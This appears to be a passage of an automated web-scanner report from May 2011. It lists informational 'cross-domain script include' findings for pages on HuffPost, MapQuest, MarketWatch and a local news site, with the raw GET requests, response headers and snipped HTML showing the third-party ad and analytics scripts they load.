Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 347610
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&v46998" type="text/css" media="screen" />
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47053"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter_serverside.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.119. http://www.huffingtonpost.com/newsinc/landing_page.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/newsinc/landing_page.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://assets.newsinc.com/ndn.2.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47053
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /newsinc/landing_page.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 93085
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=160
Date: Thu, 05 May 2011 10:58:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&v46998" type="text/css" media="screen" />
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47053"></script>
...[SNIP]...

<script type="text/javascript" src="http://assets.newsinc.com/ndn.2.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.120. http://www.huffingtonpost.com/permalink-tracker.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/permalink-tracker.html

Issue detail

The response dynamically includes the following script from another domain:

http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js

Request

Response

17.121. http://www.huffingtonpost.com/rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter_serverside.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884
http://s.huffpost.com/assets/js.php?f=v.js&v47053
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

GET /rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 179842
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&v46998" type="text/css" media="screen" />
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47053"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_scrollbar.js%2Ctwitter_serverside.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js&v46884"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.122. http://www.huffingtonpost.com/users/logout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/users/logout/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://o.aolcdn.com/ads/adsWrapper.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47053
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82719
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=ie.css%2Cie7.css&v46998" type="text/css" media="screen" />
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cjquery%2Fjquery.jdMenu.js%2Cjquery%2Fcolor.jquery.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csubmissions.js%2Cmodules%2Fhpimagecrop.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Cjquery%2Fjquery.inview.min.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Chptwitter.js%2Capp-feeds.js%2Csitemode.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47053"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

17.123. http://www.lakewoodbeacon.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lakewoodbeacon.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://shield.sitelock.com/sitelock.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Tue, 03 May 2011 20:48:46 GMT
ETag: "b4a07965-30b8-4a2654432b8de"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 12472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<img border="0" src="//shield.sitelock.com/shield/www.lakewoodbeacon.org" id="sl_shield_image" style="cursor: pointer;"/><script id="sl_shield" src="//shield.sitelock.com/sitelock.js" language="javascript"></script><script id="sl_shield" src="//shield.sitelock.com/sitelock.js" language="javascript"></script>
...[SNIP]...

17.124. http://www.mapquest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://sns-static.aolcdn.com/openauth/aolauth.min.js

Request

Response

17.125. http://www.mapquest.com/directions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/directions

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://sns-static.aolcdn.com/openauth/aolauth.min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:38 GMT
Content-Length: 33635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17.126. http://www.mapquest.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/maps

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston
http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://sns-static.aolcdn.com/openauth/aolauth.min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:39 GMT
Content-Length: 32015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17.127. http://www.mapquest.com/routeplanner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mapquest.com
Path:	/routeplanner

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston-routeplanner
http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/omniunih.js
http://sns-static.aolcdn.com/openauth/aolauth.min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:40 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:39 GMT
Content-Length: 27353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-routeplanner" media="screen, projection, print" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston-routeplanner" ></script>

<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

17.128. http://www.marketwatch.com/News/Story/Story.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;u=%5e%5e;sz=230x25;tile=1;ord=312847891?
http://c.wsj.net/dynamic/hat/hatloader3.js
http://js.revsci.net/gateway/gw.js?csid=G07608

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
